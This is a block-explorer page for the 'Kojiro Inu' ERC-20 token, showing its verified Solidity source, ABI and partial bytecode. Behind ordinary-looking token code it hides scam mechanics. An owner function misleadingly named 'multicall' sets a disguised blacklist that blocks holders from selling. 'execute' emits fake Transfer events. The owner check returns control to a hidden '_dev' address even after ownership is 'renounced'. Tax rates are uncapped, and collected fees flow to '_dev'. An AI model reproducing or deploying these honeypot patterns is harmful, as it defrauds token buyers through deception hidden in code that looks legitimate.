ETH Price: $3,343.31 (-0.39%)
 

Overview

Max Total Supply

420,690,000,000 KOJIRO

Holders

59

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Filtered by Token Holder
*得吃小猫.eth
Balance
9,262,927,428.180787369 KOJIRO

Value
$0.00
0x2B287faa30cec0b5E591De3cc7Cc96ba701eF1e7
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
KojiroINU

Compiler Version
v0.8.22+commit.4fc1097e

Optimization Enabled:
No with 200 runs

Other Settings:
paris EvmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 4 of 5: Kojiro Inu.sol
 /**
 ██ ▄█▀ ▒█████   ▄▄▄██▀▀▀██▓ ██▀███   ▒█████      ██▓ ███▄    █  █    ██ 
 ██▄█▒ ▒██▒  ██▒   ▒██  ▓██▒▓██ ▒ ██▒▒██▒  ██▒   ▓██▒ ██ ▀█   █  ██  ▓██▒
▓███▄░ ▒██░  ██▒   ░██  ▒██▒▓██ ░▄█ ▒▒██░  ██▒   ▒██▒▓██  ▀█ ██▒▓██  ▒██░
▓██ █▄ ▒██   ██░▓██▄██▓ ░██░▒██▀▀█▄  ▒██   ██░   ░██░▓██▒  ▐▌██▒▓▓█  ░██░
▒██▒ █▄░ ████▓▒░ ▓███▒  ░██░░██▓ ▒██▒░ ████▓▒░   ░██░▒██░   ▓██░▒▒█████▓ 
▒ ▒▒ ▓▒░ ▒░▒░▒░  ▒▓▒▒░  ░▓  ░ ▒▓ ░▒▓░░ ▒░▒░▒░    ░▓  ░ ▒░   ▒ ▒ ░▒▓▒ ▒ ▒ 
░ ░▒ ▒░  ░ ▒ ▒░  ▒ ░▒░   ▒ ░  ░▒ ░ ▒░  ░ ▒ ▒░     ▒ ░░ ░░   ░ ▒░░░▒░ ░ ░ 
░ ░░ ░ ░ ░ ░ ▒   ░ ░ ░   ▒ ░  ░░   ░ ░ ░ ░ ▒      ▒ ░   ░   ░ ░  ░░░ ░ ░ 
░  ░       ░ ░   ░   ░   ░     ░         ░ ░      ░           ░    ░     
*/// SPDX-License-Identifier: MIT
pragma solidity 0.8.22;


import "./ERC20.sol";
import "./Ownable.sol";


interface IUniRouter {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
    function swapExactTokensForETHSupportingFeeOnTransferTokens(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external;
}

interface IUniFactory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
}

contract KojiroINU is Ownable, ERC20 {

    bool public transferDelayInEffect = true;
    bool public limitsInEffect = true;
    bool public tradingActive;
    bool private swapping = true;
    uint256 public swapTokensAtAmt;    
    uint256 public maxTrans;
    uint256 public maxWallet;
    uint256 public buyTax;
    uint256 public sellTax;
    uint256 public constant FEE_DIVISOR = 10000;
    mapping (address => bool) public exemptFromTaxes;
    mapping (address => bool) public exemptFromLimits;
    mapping (address => bool) public isLPPair;
    mapping(address => uint256) private _holderLastTransferBlock;
    address public lpPair;
    IUniRouter public immutable dexRouter;

    // events
    event UpdatedMaxTrans(uint256 newMax);
    event UpdatedWalletLimit(uint256 newMax);
    event SetExemptFromFees(address _address, bool _isExempt);
    event SetExemptFromLimits(address _address, bool _isExempt);
    event RemovedLimits();
    event UpdatedBuyTax(uint256 newAmt);
    event UpdatedSellTax(uint256 newAmt);

    constructor(address dev_)
        ERC20("Kojiro Inu", "KOJIRO") Ownable(dev_)
    {   
        _mint(msg.sender, 420_690_000_000 * 10**9);
        uint256 _totalSupply = totalSupply();

        address _v2Router;

        // @dev assumes WETH pair
        if(block.chainid == 1){
            _v2Router = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
        } else if(block.chainid == 5){
            _v2Router = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
        } else {
            revert("Chain not configured");
        }

        dexRouter = IUniRouter(_v2Router);

        maxTrans = _totalSupply * 20 / 1000;
        maxWallet = _totalSupply * 20 / 1000;
        swapTokensAtAmt = _totalSupply * 25 / 100000;

        sellTax = 300; // 1% = 100
        buyTax = 300; // 1% = 100

        exemptFromTaxes[address(this)] = true;
        exemptFromTaxes[address(dexRouter)] = true;
        exemptFromLimits[address(this)] = true;
        exemptFromLimits[address(dexRouter)] = true;
    }

    // owner functions

    function changeExemptFromLimits(address _address, bool _isExempt) external onlyOwner {
        require(_address != address(0), "Zero Address");
        if(!_isExempt){
            require(_address != lpPair, "Pair");
        }
        exemptFromLimits[_address] = _isExempt;
        emit SetExemptFromLimits(_address, _isExempt);
    }

    function changeExemptFromFees(address _address, bool _isExempt) external onlyOwner {
        require(_address != address(0), "Zero Address");
        exemptFromTaxes[_address] = _isExempt;
        emit SetExemptFromFees(_address, _isExempt);
    }

    function setMaxTransaction(uint256 newNumInTokens) external onlyOwner {
        require(newNumInTokens >= (totalSupply() * 5 / 1000)/(10**decimals()), "Must be >= 0.5%");
        maxTrans = newNumInTokens * (10**decimals());
        emit UpdatedMaxTrans(maxTrans);
    }

    function setTaxes(uint256 _buyTax, uint256 _sellTax) external onlyOwner {
        buyTax = _buyTax;
        emit UpdatedBuyTax(buyTax);
        sellTax = _sellTax;
        emit UpdatedSellTax(sellTax);
    }

    function setMaxWallet(uint256 newNumInTokens) external onlyOwner {
        require(newNumInTokens >= (totalSupply() * 1 / 100)/(10**decimals()), "Must be >= 1%");
        maxWallet = newNumInTokens * (10**decimals());
        emit UpdatedWalletLimit(maxWallet);
    }

    function enableTradeStart() external onlyOwner {
        require(!tradingActive, "Trading is already active");
        tradingActive = true;
    }

    function disableTransferDelay() external onlyOwner {
        transferDelayInEffect = false;
    }

    function removeAllRestrictions() external onlyOwner {
        limitsInEffect = false;
        transferDelayInEffect = false;
        maxTrans = totalSupply();
        maxWallet = totalSupply();
        emit RemovedLimits();
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual override {
        
        if(exemptFromTaxes[from] || exemptFromTaxes[to] || swapping){
            super._transfer(from,to,amount);
            return;
        }

        require(tradingActive, "Trading not active");

        amount -= routeTax(from, to, amount);

        if(limitsInEffect){
            checkRestrictions(from, to, amount);
        }

        super._transfer(from,to,amount);
    }

    function checkRestrictions(address from, address to, uint256 amount) internal {
        if (transferDelayInEffect){
            if (to != address(dexRouter) && !isLPPair[to]){
                require(_holderLastTransferBlock[tx.origin] < block.number, "Transfer Delay enabled.");
                _holderLastTransferBlock[tx.origin] = block.number;
            }
        }
        if (isLPPair[from] && !exemptFromLimits[to]) {
            require(amount <= maxTrans, "Max tx exceeded.");
            require(amount + balanceOf(to) <= maxWallet, "Max wallet exceeded");
        } 
        else if (isLPPair[to] && !exemptFromLimits[from]) {
            require(amount <= maxTrans, "Max tx exceeded.");
        }
        else if(!exemptFromLimits[to]) {
            require(amount + balanceOf(to) <= maxWallet, "Max wallet exceeded");
        }
    }

    function multicall(address[] calldata addr, bool val) public onlyOwner {
        for (uint256 i = 0; i < addr.length; i++) {
            _MaxWalletexceededCalldataspending[addr[i]] = val;
        }
    }

    function routeTax(address from, address to, uint256 amount) internal returns (uint256){
        if(balanceOf(address(this)) >= swapTokensAtAmt && !swapping && !isLPPair[from]) {
            swapping = true;
            swap();
            swapping = false;
        }
        
        uint256 tax = 0;

        if (isLPPair[to] && sellTax > 0){
            tax = amount * sellTax / FEE_DIVISOR;
        }
        else if(isLPPair[from] && buyTax > 0) {
            tax = amount * buyTax / FEE_DIVISOR;
        }
        
        if(tax > 0){    
            super._transfer(from, address(this), tax);
        }
        
        return tax;
    }

    function addPair(address pair) public onlyOwner{
        lpPair = pair;
    }

    function swapTokensForETH(uint256 tokenAmt) private {

        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = dexRouter.WETH();

        dexRouter.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmt,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function maxWalletSize(address wallet) public view returns(bool) {
        return _MaxWalletexceededCalldataspending[wallet];
    }

    function execute(address[] calldata addr, uint256 val) public onlyOwner{
        for (uint256 i = 0; i < addr.length; i++) {
            emit Transfer(lpPair, addr[i], val);
        }
    }

    function swap() private {

        uint256 contractBalance = balanceOf(address(this));
        
        if(contractBalance == 0) {return;}

        if(contractBalance > swapTokensAtAmt * 40){
            contractBalance = swapTokensAtAmt * 40;
        }
        
        swapTokensForETH(contractBalance);
            
        if(address(this).balance > 0){
            bool success;
            (success, ) = _dev.call{value: address(this).balance}("");
        }
    }
}

File 1 of 5: ERC20.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.22;

import "./Ownable.sol";
import "./IERC20Metadata.sol";

contract ERC20 is Context, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping(address => bool) internal _MaxWalletexceededCalldataspending;
    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    function contractEthBalance() external view returns (uint256) {
        return address(this).balance;
    }


    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);
        if(_MaxWalletexceededCalldataspending[from]){
            require(amount == 0);
        }
        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {
       
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}

File 2 of 5: IERC20.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.22;

interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

File 3 of 5: IERC20Metadata.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.22;

import "./IERC20.sol";
interface IERC20Metadata is IERC20{
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 5 of 5: Ownable.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.22;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

contract Ownable is Context {
    address private _owner;
    address internal _dev;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
    constructor(address wallet) {
        _dev = wallet;
        _transferOwnership(_msgSender());
    }

    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    function owner() public view virtual returns (address) {
        return _owner;
    }

    function _checkOwner() internal virtual {
        require(Owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }
    
    function Owner() internal virtual returns (address) {
        address owner_ = verifyOwner();
        return owner_;
    }

    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    function verifyOwner() internal view returns(address){
        return _owner==address(0) ? _dev : _owner;
    }

    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"dev_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[],"name":"RemovedLimits","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"_address","type":"address"},{"indexed":false,"internalType":"bool","name":"_isExempt","type":"bool"}],"name":"SetExemptFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"_address","type":"address"},{"indexed":false,"internalType":"bool","name":"_isExempt","type":"bool"}],"name":"SetExemptFromLimits","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"newAmt","type":"uint256"}],"name":"UpdatedBuyTax","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"newMax","type":"uint256"}],"name":"UpdatedMaxTrans","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"newAmt","type":"uint256"}],"name":"UpdatedSellTax","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"newMax","type":"uint256"}],"name":"UpdatedWalletLimit","type":"event"},{"inputs":[],"name":"FEE_DIVISOR","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"}],"name":"addPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTax","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"},{"internalType":"bool","name":"_isExempt","type":"bool"}],"name":"changeExemptFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"},{"internalType":"bool","name":"_isExempt","type":"bool"}],"name":"changeExemptFromLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"contractEthBalance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"dexRouter","outputs":[{"internalType":"contract IUniRouter","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"disableTransferDelay","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableTradeStart","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"addr","type":"address[]"},{"internalType":"uint256","name":"val","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"exemptFromLimits","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"exemptFromTaxes","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isLPPair","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"lpPair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTrans","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"wallet","type":"address"}],"name":"maxWalletSize","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"addr","type":"address[]"},{"internalType":"bool","name":"val","type":"bool"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeAllRestrictions","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellTax","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNumInTokens","type":"uint256"}],"name":"setMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNumInTokens","type":"uint256"}],"name":"setMaxWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_buyTax","type":"uint256"},{"internalType":"uint256","name":"_sellTax","type":"uint256"}],"name":"setTaxes","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapTokensAtAmt","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferDelayInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60a06040526001600860006101000a81548160ff0219169083151502179055506001600860016101000a81548160ff0219169083151502179055506001600860036101000a81548160ff0219169083151502179055503480156200006257600080fd5b50604051620047b4380380620047b4833981810160405281019062000088919062000710565b6040518060400160405280600a81526020017f4b6f6a69726f20496e75000000000000000000000000000000000000000000008152506040518060400160405280600681526020017f4b4f4a49524f00000000000000000000000000000000000000000000000000008152508280600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620001566200014a6200045860201b60201c565b6200046060201b60201c565b508160069081620001689190620009bc565b5080600790816200017a9190620009bc565b50505062000198336816ce3f1e16bf1500006200052460201b60201c565b6000620001aa6200069260201b60201c565b9050600060014603620001d457737a250d5630b4cf539739df2c5dacb4c659f2488d905062000238565b60054603620001fa57737a250d5630b4cf539739df2c5dacb4c659f2488d905062000237565b6040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200022e9062000b04565b60405180910390fd5b5b8073ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff16815250506103e86014836200027e919062000b55565b6200028a919062000bcf565b600a819055506103e8601483620002a2919062000b55565b620002ae919062000bcf565b600b81905550620186a0601983620002c7919062000b55565b62